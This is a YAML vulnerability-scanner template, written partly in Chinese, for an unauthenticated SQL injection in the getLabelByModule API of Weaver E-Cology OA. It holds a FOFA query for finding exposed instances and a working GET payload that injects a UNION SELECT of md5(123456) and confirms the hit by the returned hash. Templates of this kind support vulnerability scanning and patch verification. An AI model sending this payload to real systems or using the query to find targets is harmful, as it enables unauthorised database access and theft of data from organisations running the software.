product: 泛微E-Cology
vName: 泛微E-Cology getLabelByModule SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 由于泛微e-cology未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息，进一步利用可能获取目标系统权限等。
version: ''
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
protocol: http
link: https://blog.csdn.net/weixin_43567873/article/details/137908375
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /api/ec/dev/locale/getLabelByModule?moduleCode=?moduleCode=?moduleCode=aaa') union all select '1,md5(123456)' --
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and